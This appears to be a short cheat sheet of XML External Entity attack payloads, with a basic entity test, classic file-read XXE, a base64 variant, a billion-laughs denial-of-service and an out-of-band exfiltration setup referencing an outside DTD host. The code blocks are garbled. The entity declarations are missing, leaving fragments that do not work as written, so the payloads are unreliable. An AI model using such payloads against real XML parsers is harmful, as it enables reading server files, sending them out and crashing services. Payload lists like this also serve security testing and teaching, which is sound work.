# XML External Entity An XML External Entity attack is a type of attack against an application that parses XML input ## Exploit Basic Test ``` ]> John &example; ``` Classic XXE ``` ]> &file; ``` Classic XXE Base64 encoded ``` %init; ]> ``` Deny Of Service - Billion Laugh Attack ``` ]> &a4; ``` XXE OOB Attack (Yunusov, 2013) ``` &send; File stored on http://publicServer.com/parameterEntity_oob.dtd "> %all; ``` ## Thanks to * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing